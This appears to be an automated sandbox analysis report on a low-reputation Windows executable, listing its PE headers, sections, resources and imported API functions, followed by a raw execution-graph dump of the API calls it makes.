IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x74000 | 0x23dc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3c1b0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x366a8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x34000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3d85c | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x32dbc | 0x32e00 | 59fca22eb14bf065790ccabf936fb764 | False | 0.5921807816339066 | data | 6.705384121865264 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x34000 | 0xb1d0 | 0xb200 | 3d7416119125f570d6c385b5ba208d7a | False | 0.46034497893258425 | data | 5.270635796862559 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x40000 | 0x24750 | 0x1200 | edc39ed5cd62e969c2b4607a1a95cf98 | False | 0.4058159722222222 | data | 4.083550519415643 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x65000 | 0x1a4 | 0x200 | 185ed7102f068a73891dd850643e3d14 | False | 0.46484375 | data | 3.50335535460232 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x66000 | 0xdff8 | 0xe000 | 699399d7d2e63f9a36984a221fc02f75 | False | 0.6373465401785714 | data | 6.63871928699419 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x74000 | 0x23dc | 0x2400 | 539b0c53eda4d1d9ffe2e69d5037d71f | False | 0.7864583333333334 | data | 6.678617573231213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x66650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x67198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x68748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x68cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x69558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x6a400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x6a868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x6b910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6deb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x72588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x72358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x72498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x72228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x71ef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x71c98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x72f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x73150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x73320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x734d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x73620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x73a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x73bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x73d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x73e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x73f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x71c30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x72810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
| DLL | Import |
|---|---|
| KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage |
| OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear |
| gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree |

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |
No network behavior found


Target ID: 0
Start time: 09:32:21
Start date: 30/09/2024
Path: C:\Users\user\Desktop\fcl52nBWuY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\fcl52nBWuY.exe"
Imagebase: 0x40000
File size: 339'886 bytes
MD5 hash: F80C1317F5043D991A91E5FB6399E658
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 9.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 10.2%
Total number of Nodes: 1516
Total number of Limit Nodes: 46
25020->25025 25026 5cd2f GetModuleFileNameW 25020->25026 25031 44a20 _swprintf 51 API calls 25021->25031 25124 412d1 GetDlgItem ShowWindow 25022->25124 25023 5d355 25029 5aee5 40 API calls 25023->25029 25036 4f937 53 API calls 25024->25036 25025->24936 25025->25024 25207 505e6 83 API calls 25026->25207 25033 5ccbd 25028->25033 25029->24986 25030->24986 25030->25023 25034 4f937 53 API calls 25030->25034 25031->24994 25032 5cf52 25125 412d1 GetDlgItem ShowWindow 25032->25125 25116 4a8ce 25033->25116 25034->25030 25040 5cef1 25036->25040 25041 5d28c 25037->25041 25038 5cd57 25043 44a20 _swprintf 51 API calls 25038->25043 25044 44a20 _swprintf 51 API calls 25040->25044 25041->25004 25045 5d295 DialogBoxParamW 25041->25045 25042 5cf5c 25047 4f937 53 API calls 25042->25047 25046 5cd79 CreateFileMappingW 25043->25046 25049 5cf0f 25044->25049 25045->24936 25045->25004 25052 5cdd7 GetCommandLineW 25046->25052 25080 5ce4e __InternalCxxFrameHandler 25046->25080 25050 5cf66 SetDlgItemTextW 25047->25050 25060 4f937 53 API calls 25049->25060 25126 412d1 GetDlgItem ShowWindow 25050->25126 25051 5cce3 25055 5ccf5 25051->25055 25056 5ccea GetLastError 25051->25056 25053 5cde8 25052->25053 25208 5c605 SHGetMalloc 25053->25208 25058 4a801 81 API calls 25055->25058 25056->25055 25057 5cf78 SetDlgItemTextW GetDlgItem 25061 5cf95 GetWindowLongW SetWindowLongW 25057->25061 25062 5cfad 25057->25062 25058->25013 25064 5cf29 25060->25064 25061->25062 25127 5d872 25062->25127 25063 5ce04 25209 5c605 SHGetMalloc 25063->25209 25068 5ce10 25210 5c605 SHGetMalloc 25068->25210 25069 5d872 98 API calls 25071 5cfc9 25069->25071 25152 5eb92 25071->25152 25072 5ce1c 25211 50695 83 API calls 25072->25211 25074 5ceb7 25074->25025 25079 5cecd UnmapViewOfFile CloseHandle 25074->25079 25076 5ce2d MapViewOfFile 25076->25080 25078 5d872 98 API calls 25084 5cfef 25078->25084 25079->25025 25080->25074 25081 5cea3 Sleep 25080->25081 25081->25074 25081->25080 25082 5d018 25212 412b3 GetDlgItem EnableWindow 
25082->25212 25084->25082 25086 5d872 98 API calls 25084->25086 25085->24936 25085->24957 25086->25082 25088 412ff 25087->25088 25089 41358 25087->25089 25090 41365 25088->25090 25234 4f608 62 API calls 2 library calls 25088->25234 25235 4f5e1 GetWindowLongW SetWindowLongW 25089->25235 25090->24925 25090->24926 25090->24927 25093 41321 25093->25090 25094 41327 GetParent 25093->25094 25094->25090 25095 41334 GetDlgItem 25094->25095 25095->25090 25096 41344 25095->25096 25096->25090 25097 4134a SetWindowTextW 25096->25097 25097->25090 25236 5c748 PeekMessageW 25098->25236 25101 5e635 25241 5a235 25101->25241 25102 5e669 SendMessageW SendMessageW 25104 5e6a5 25102->25104 25105 5e6c4 SendMessageW SendMessageW SendMessageW 25102->25105 25104->25105 25107 5e6f7 SendMessageW 25105->25107 25108 5e71a SendMessageW 25105->25108 25107->25108 25108->24973 25112 4b34b 25109->25112 25110 4b3dc 25111 4b542 8 API calls 25110->25111 25113 4b405 25110->25113 25111->25113 25112->25110 25112->25113 25244 4b542 25112->25244 25113->24995 25113->24996 25115->25007 25117 4a8d8 25116->25117 25118 4a935 CreateFileW 25117->25118 25119 4a929 25117->25119 25118->25119 25120 4cf32 GetCurrentDirectoryW 25119->25120 25122 4a97f 25119->25122 25121 4a964 25120->25121 25121->25122 25123 4a968 CreateFileW 25121->25123 25122->25051 25123->25122 25124->25032 25125->25042 25126->25057 25128 5d87c __EH_prolog 25127->25128 25129 5cfbb 25128->25129 25265 5c4f4 ExpandEnvironmentStringsW 25128->25265 25129->25069 25133 5db9a SetWindowTextW 25138 5d8b3 _wcslen _wcsrchr 25133->25138 25138->25129 25138->25133 25139 5d988 SetFileAttributesW 25138->25139 25151 5d9a2 _abort _wcslen 25138->25151 25266 53306 CompareStringW 25138->25266 25267 5b64d GetCurrentDirectoryW 25138->25267 25269 4b9ca 6 API calls 25138->25269 25270 4b953 FindClose 25138->25270 25271 5c66e 77 API calls 2 library calls 25138->25271 25272 6520e 25138->25272 25285 5c4f4 ExpandEnvironmentStringsW 25138->25285 25141 5da42 GetFileAttributesW 
25139->25141 25139->25151 25141->25138 25143 5da54 DeleteFileW 25141->25143 25143->25138 25145 5da65 25143->25145 25144 5dd64 GetDlgItem SetWindowTextW SendMessageW 25144->25151 25146 44a20 _swprintf 51 API calls 25145->25146 25147 5da85 GetFileAttributesW 25146->25147 25147->25145 25149 5da9a MoveFileW 25147->25149 25148 5dda4 SendMessageW 25148->25138 25149->25138 25150 5dab2 MoveFileExW 25149->25150 25150->25138 25151->25138 25151->25141 25151->25144 25151->25148 25268 4cdc0 51 API calls 2 library calls 25151->25268 25153 5eb9c __EH_prolog 25152->25153 25297 5197c 25153->25297 25155 5ebcd 25301 464ed 25155->25301 25157 5ebeb 25305 48823 25157->25305 25161 5ec3e 25323 4890a 25161->25323 25163 5cfda 25163->25078 25165 5e7e8 25164->25165 25166 5b5c6 4 API calls 25165->25166 25167 5e7ed 25166->25167 25168 5e7f5 GetWindow 25167->25168 25169 5d101 25167->25169 25168->25169 25172 5e815 25168->25172 25169->24932 25169->24933 25170 5e822 GetClassNameW 25825 53306 CompareStringW 25170->25825 25172->25169 25172->25170 25173 5e846 GetWindowLongW 25172->25173 25174 5e8aa GetWindow 25172->25174 25173->25174 25175 5e856 SendMessageW 25173->25175 25174->25169 25174->25172 25175->25174 25176 5e86c GetObjectW 25175->25176 25826 5b605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25176->25826 25178 5e883 25827 5b5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25178->25827 25828 5b80c 8 API calls 25178->25828 25181 5e894 SendMessageW DeleteObject 25181->25174 25182->24949 25184 5bbf6 25183->25184 25185 5bbd1 25183->25185 25189 5c207 25184->25189 25829 53306 CompareStringW 25185->25829 25187 5bbe4 25187->25184 25188 5bbe8 FindWindowExW 25187->25188 25188->25184 25190 5c211 __EH_prolog 25189->25190 25191 413f8 43 API calls 25190->25191 25192 5c233 25191->25192 25830 42083 25192->25830 25195 5c24d 25197 41641 87 API calls 25195->25197 25196 5c25c 25198 41a7e 143 API calls 25196->25198 25199 5c258 25197->25199 25201 5c27b __InternalCxxFrameHandler ___std_exception_copy 25198->25201 
25199->24975 25199->24978 25200 41641 87 API calls 25200->25199 25201->25200 25202->24956 25838 4b4d3 25203->25838 25206->24977 25207->25038 25208->25063 25209->25068 25210->25072 25211->25076 25212->25085 25846 5ac14 LoadCursorW RegisterClassExW 25213->25846 25215 5af0f 25216 5af25 25215->25216 25847 68a08 26 API calls 2 library calls 25215->25847 25218 5af3d GetWindowRect GetParent MapWindowPoints 25216->25218 25848 68a08 26 API calls 2 library calls 25216->25848 25221 5af77 DestroyWindow 25218->25221 25222 5af80 GetParent CreateWindowExW 25218->25222 25221->25222 25223 5b008 25222->25223 25224 5afcb 25222->25224 25225 5b00c ShowWindow UpdateWindow 25223->25225 25226 5b01e 25223->25226 25224->25223 25227 5afd0 25224->25227 25225->25226 25226->25014 25227->25226 25849 5ad0e CompareStringW _wcslen ___std_exception_copy 25227->25849 25229 5afe8 25229->25226 25230 5afee ShowWindow SetWindowTextW 25229->25230 25231 5b005 25230->25231 25231->25226 25232->25010 25233->25000 25234->25093 25235->25090 25237 5c763 KiUserCallbackDispatcher 25236->25237 25238 5c79c GetDlgItem 25236->25238 25239 5c779 IsDialogMessageW 25237->25239 25240 5c788 TranslateMessage DispatchMessageW 25237->25240 25238->25101 25238->25102 25239->25238 25239->25240 25240->25238 25242 5a23e DestroyWindow 25241->25242 25243 5a24b ShowWindow SendMessageW SendMessageW 25241->25243 25242->25243 25243->25102 25245 4b54f 25244->25245 25246 4b573 25245->25246 25247 4b566 CreateDirectoryW 25245->25247 25248 4b4c1 3 API calls 25246->25248 25247->25246 25252 4b5a6 25247->25252 25249 4b579 25248->25249 25250 4b5b9 GetLastError 25249->25250 25253 4cf32 GetCurrentDirectoryW 25249->25253 25251 4b5b5 25250->25251 25251->25112 25252->25251 25257 4b8e6 25252->25257 25255 4b58f 25253->25255 25255->25250 25256 4b593 CreateDirectoryW 25255->25256 25256->25250 25256->25252 25258 5ffc0 25257->25258 25259 4b8f3 SetFileAttributesW 25258->25259 25260 4b936 25259->25260 25261 4b909 25259->25261 25260->25251 25262 4cf32 
GetCurrentDirectoryW 25261->25262 25263 4b91d 25262->25263 25263->25260 25264 4b921 SetFileAttributesW 25263->25264 25264->25260 25265->25138 25266->25138 25267->25138 25268->25151 25269->25138 25270->25138 25271->25138 25273 6a694 25272->25273 25274 6a6a1 25273->25274 25275 6a6ac 25273->25275 25286 6a7ee 25274->25286 25277 6a6b4 25275->25277 25283 6a6bd _abort 25275->25283 25278 6a65a _free 20 API calls 25277->25278 25281 6a6a9 25278->25281 25279 6a6e7 HeapReAlloc 25279->25281 25279->25283 25280 6a6c2 25293 6a7db 20 API calls __dosmaperr 25280->25293 25281->25138 25283->25279 25283->25280 25294 68e4c 7 API calls 2 library calls 25283->25294 25285->25138 25287 6a82c 25286->25287 25291 6a7fc _abort 25286->25291 25296 6a7db 20 API calls __dosmaperr 25287->25296 25289 6a817 RtlAllocateHeap 25290 6a82a 25289->25290 25289->25291 25290->25281 25291->25287 25291->25289 25295 68e4c 7 API calls 2 library calls 25291->25295 25293->25281 25294->25283 25295->25291 25296->25290 25298 51989 _wcslen 25297->25298 25332 41895 25298->25332 25300 519a1 25300->25155 25302 5197c _wcslen 25301->25302 25303 41895 79 API calls 25302->25303 25304 519a1 25303->25304 25304->25157 25306 4882d __EH_prolog 25305->25306 25345 4e298 25306->25345 25308 48855 25309 5feae 27 API calls 25308->25309 25310 48899 _abort 25309->25310 25311 5feae 27 API calls 25310->25311 25313 488c0 25311->25313 25355 55c54 25313->25355 25315 48a38 25316 48a42 25315->25316 25318 48ab5 25316->25318 25398 4b966 25316->25398 25317 48b1a 25321 48b5c 25317->25321 25404 41397 75 API calls 25317->25404 25318->25317 25376 490a2 25318->25376 25321->25161 25812 4a41a DeleteFileW DeleteFileW GetCurrentDirectoryW _abort 25323->25812 25325 4892b 25327 4893c Concurrency::cancel_current_task 25325->25327 25813 53536 25325->25813 25328 42111 26 API calls 25327->25328 25329 48963 25328->25329 25330 4e339 87 API calls 25329->25330 25331 4896b 25330->25331 25331->25163 25333 418ff 25332->25333 25334 418a7 25332->25334 25333->25300 25335 
418d0 25334->25335 25342 476e9 77 API calls __vswprintf_c_l 25334->25342 25336 6520e 22 API calls 25335->25336 25338 418f0 25336->25338 25338->25333 25344 4775a 76 API calls 25338->25344 25339 418c6 25343 4775a 76 API calls 25339->25343 25342->25339 25343->25335 25344->25333 25346 4e2a2 __EH_prolog 25345->25346 25347 5feae 27 API calls 25346->25347 25348 4e2e5 25347->25348 25349 4e2f8 25348->25349 25350 46891 41 API calls 25348->25350 25351 5feae 27 API calls 25349->25351 25350->25349 25352 4e309 25351->25352 25353 4e31c 25352->25353 25361 46891 25352->25361 25353->25308 25356 55c5e __EH_prolog 25355->25356 25357 5feae 27 API calls 25356->25357 25358 55c7a 25357->25358 25359 488f2 25358->25359 25375 5215f 81 API calls 25358->25375 25359->25315 25362 4689b __EH_prolog 25361->25362 25367 60013 25362->25367 25364 468b7 25365 60013 41 API calls 25364->25365 25366 468d9 _abort 25365->25366 25366->25353 25368 6001f ___scrt_is_nonwritable_in_current_image 25367->25368 25369 6004a 25368->25369 25371 46920 25368->25371 25369->25364 25372 4692a __EH_prolog 25371->25372 25373 504e5 41 API calls 25372->25373 25374 46936 25373->25374 25374->25368 25375->25359 25377 490ac __EH_prolog 25376->25377 25405 413f8 25377->25405 25379 490c8 25380 490d9 25379->25380 25569 4b1d2 25379->25569 25384 49110 25380->25384 25417 41ad3 25380->25417 25383 4910c 25383->25384 25436 42032 25383->25436 25561 41641 25384->25561 25388 491b2 25440 4924e 25388->25440 25392 49211 25392->25384 25448 44264 25392->25448 25460 492c6 25392->25460 25396 4b966 7 API calls 25397 49139 25396->25397 25397->25388 25397->25396 25573 4d4d2 CompareStringW _wcslen 25397->25573 25399 4b97b 25398->25399 25403 4b9a9 25399->25403 25801 4ba94 25399->25801 25401 4b98b 25402 4b990 FindClose 25401->25402 25401->25403 25402->25403 25403->25316 25404->25321 25406 413fd __EH_prolog 25405->25406 25407 46891 41 API calls 25406->25407 25408 41428 25407->25408 25409 4e298 41 API calls 25408->25409 25410 41437 25409->25410 25411 5feae 
27 API calls 25410->25411 25414 414ab 25410->25414 25412 41498 25411->25412 25412->25414 25416 4644d 43 API calls 25412->25416 25574 4c1f7 25414->25574 25415 41533 _abort 25415->25379 25416->25414 25418 41add __EH_prolog 25417->25418 25419 41b30 25418->25419 25425 41c63 25418->25425 25592 413d9 25418->25592 25421 41c9e 25419->25421 25419->25425 25426 41cab 25419->25426 25595 41397 75 API calls 25421->25595 25424 44264 116 API calls 25428 41ce9 25424->25428 25425->25383 25426->25424 25426->25425 25427 41d31 25427->25425 25429 41d64 25427->25429 25596 41397 75 API calls 25427->25596 25428->25427 25431 44264 116 API calls 25428->25431 25429->25425 25435 4b110 80 API calls 25429->25435 25431->25428 25432 44264 116 API calls 25433 41db5 25432->25433 25433->25425 25433->25432 25434 4b110 80 API calls 25434->25419 25435->25433 25437 42037 __EH_prolog 25436->25437 25439 42068 25437->25439 25610 41a7e 25437->25610 25439->25397 25615 4e395 25440->25615 25442 4925e 25619 526f1 GetSystemTime SystemTimeToFileTime 25442->25619 25444 491cc 25444->25392 25445 52ea4 25444->25445 25624 5ef9b 25445->25624 25449 44274 25448->25449 25450 44270 25448->25450 25459 4b110 80 API calls 25449->25459 25450->25392 25451 44286 25452 442a1 25451->25452 25453 442af 25451->25453 25455 442e1 25452->25455 25632 4395a 104 API calls 3 library calls 25452->25632 25633 42eb6 116 API calls 3 library calls 25453->25633 25455->25392 25457 442ad 25457->25455 25634 42544 75 API calls 25457->25634 25459->25451 25461 492d0 __EH_prolog 25460->25461 25464 4930e 25461->25464 25480 4973d Concurrency::cancel_current_task 25461->25480 25675 59c9d 118 API calls 25461->25675 25463 4a18d 25465 4a1c5 25463->25465 25466 4a192 25463->25466 25464->25463 25469 4932f 25464->25469 25464->25480 25465->25480 25707 59c9d 118 API calls 25465->25707 25466->25480 25706 48675 167 API calls 25466->25706 25469->25480 25635 466df 25469->25635 25471 49545 25478 49669 25471->25478 25471->25480 25678 48f6b 38 API calls 25471->25678 25473 
49405 25473->25471 25676 4b5d6 57 API calls 3 library calls 25473->25676 25476 495ac 25677 68a08 26 API calls 2 library calls 25476->25677 25481 4b966 7 API calls 25478->25481 25483 496db 25478->25483 25480->25392 25481->25483 25482 49935 25685 4e4a9 97 API calls 25482->25685 25641 489c8 25483->25641 25486 4976c 25508 497c5 25486->25508 25679 44727 41 API calls 2 library calls 25486->25679 25489 49990 25490 49a3a 25489->25490 25495 499bb 25489->25495 25493 49a8c 25490->25493 25506 49a45 25490->25506 25498 49a2c 25493->25498 25689 48db3 120 API calls 25493->25689 25494 49a8a 25499 4a801 81 API calls 25494->25499 25496 49ae8 25495->25496 25495->25498 25501 4b4c1 3 API calls 25495->25501 25519 49b53 25496->25519 25550 4a14a 25496->25550 25690 4ab1c 25496->25690 25498->25494 25498->25496 25499->25480 25500 4a801 81 API calls 25500->25480 25502 499f3 25501->25502 25502->25498 25687 4a50a 98 API calls 25502->25687 25506->25494 25688 48b7c 124 API calls 25506->25688 25507 49ba2 25512 4bf0a 27 API calls 25507->25512 25508->25480 25509 498ed 25508->25509 25516 498f4 Concurrency::cancel_current_task 25508->25516 25680 487fb 41 API calls 25508->25680 25681 4e4a9 97 API calls 25508->25681 25682 4237a 75 API calls 25508->25682 25683 48f28 99 API calls 25508->25683 25684 4237a 75 API calls 25509->25684 25532 49bb8 25512->25532 25516->25489 25686 4851f 50 API calls 2 library calls 25516->25686 25517 49b41 25694 47951 78 API calls 25517->25694 25647 4bf0a 25519->25647 25520 49c8b 25521 49e85 25520->25521 25522 49ce7 25520->25522 25523 49e97 25521->25523 25524 49eab 25521->25524 25536 49d20 25521->25536 25525 49cff 25522->25525 25530 49da7 25522->25530 25701 4a475 138 API calls __EH_prolog 25523->25701 25651 54576 25524->25651 25526 49d46 25525->25526 25533 49d0e 25525->25533 25526->25536 25697 4829b 112 API calls 25526->25697 25529 49ec4 25661 5421f 25529->25661 25698 48f6b 38 API calls 25530->25698 25531 49c62 25531->25520 25695 4ac9c 83 API calls 25531->25695 25532->25520 
25532->25531 25541 4aa7a 80 API calls 25532->25541 25696 4237a 75 API calls 25533->25696 25539 49e76 25536->25539 25549 49fca 25536->25549 25702 4237a 75 API calls 25536->25702 25539->25392 25541->25531 25542 49dec 25542->25536 25543 49e1f 25542->25543 25544 49e08 25542->25544 25700 4a212 104 API calls __EH_prolog 25543->25700 25699 48037 86 API calls 25544->25699 25548 4a0d5 25548->25550 25552 4b8e6 3 API calls 25548->25552 25549->25548 25549->25550 25551 4a083 25549->25551 25703 4b199 SetEndOfFile 25549->25703 25550->25500 25670 4b032 25551->25670 25553 4a130 25552->25553 25553->25550 25704 4237a 75 API calls 25553->25704 25556 4a0ca 25558 4a880 78 API calls 25556->25558 25558->25548 25559 4a140 25705 47871 77 API calls 25559->25705 25562 41653 25561->25562 25564 41665 Concurrency::cancel_current_task 25561->25564 25562->25564 25788 416b2 25562->25788 25565 42111 26 API calls 25564->25565 25566 41694 25565->25566 25791 4e339 25566->25791 25570 4b1e9 25569->25570 25571 4b1f3 25570->25571 25800 477af 79 API calls 25570->25800 25571->25380 25573->25397 25575 4c20d _abort 25574->25575 25580 4c0d3 25575->25580 25587 4c0b4 25580->25587 25582 4c148 25583 42111 25582->25583 25584 4211c 25583->25584 25585 4212b 25583->25585 25591 4136b 26 API calls Concurrency::cancel_current_task 25584->25591 25585->25415 25588 4c0c2 25587->25588 25589 4c0bd 25587->25589 25588->25582 25590 42111 26 API calls 25589->25590 25590->25588 25591->25585 25597 41822 25592->25597 25595->25425 25596->25429 25598 41834 25597->25598 25599 413f2 25597->25599 25600 4185d 25598->25600 25607 476e9 77 API calls __vswprintf_c_l 25598->25607 25599->25434 25602 6520e 22 API calls 25600->25602 25604 4187a 25602->25604 25603 41853 25608 4775a 76 API calls 25603->25608 25604->25599 25609 4775a 76 API calls 25604->25609 25607->25603 25608->25600 25609->25599 25611 41a8e 25610->25611 25613 41a8a 25610->25613 25614 419c5 143 API calls 25611->25614 25613->25439 25614->25613 25616 4e3a5 25615->25616 25618 4e3ac 
25615->25618 25620 4aa7a 25616->25620 25618->25442 25619->25444 25621 4aa93 25620->25621 25623 4b110 80 API calls 25621->25623 25622 4aac5 25622->25618 25623->25622 25625 5efa8 25624->25625 25626 4f937 53 API calls 25625->25626 25627 5efcb 25626->25627 25628 44a20 _swprintf 51 API calls 25627->25628 25629 5efdd 25628->25629 25630 5e607 17 API calls 25629->25630 25631 52eba 25630->25631 25631->25392 25632->25457 25633->25457 25634->25455 25636 466ef 25635->25636 25708 465fb 25636->25708 25639 46722 25640 4675a 25639->25640 25713 4c6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25639->25713 25640->25473 25642 489dd 25641->25642 25643 48a15 25642->25643 25719 47931 75 API calls 25642->25719 25643->25480 25643->25482 25643->25486 25645 48a0d 25720 41397 75 API calls 25645->25720 25648 4bf18 25647->25648 25650 4bf22 25647->25650 25649 5feae 27 API calls 25648->25649 25649->25650 25650->25507 25652 54595 ___std_exception_copy 25651->25652 25653 5458b 25651->25653 25655 5461b 25652->25655 25656 546c5 25652->25656 25660 5463f _abort 25652->25660 25721 4775a 76 API calls 25653->25721 25722 544a9 76 API calls 3 library calls 25655->25722 25723 63330 RaiseException 25656->25723 25659 546f1 25660->25529 25662 54251 25661->25662 25663 54228 25661->25663 25664 54245 25662->25664 25738 566c4 138 API calls 2 library calls 25662->25738 25663->25664 25665 54247 25663->25665 25667 5423d 25663->25667 25664->25536 25737 5739e 133 API calls 25665->25737 25724 57dcc 25667->25724 25671 4b043 25670->25671 25674 4b052 25670->25674 25672 4b049 FlushFileBuffers 25671->25672 25671->25674 25672->25674 25673 4b0cf SetFileTime 25673->25556 25674->25673 25675->25464 25676->25476 25677->25471 25678->25478 25679->25508 25680->25508 25681->25508 25682->25508 25683->25508 25684->25516 25685->25516 25686->25489 25687->25498 25688->25494 25689->25498 25691 4ab25 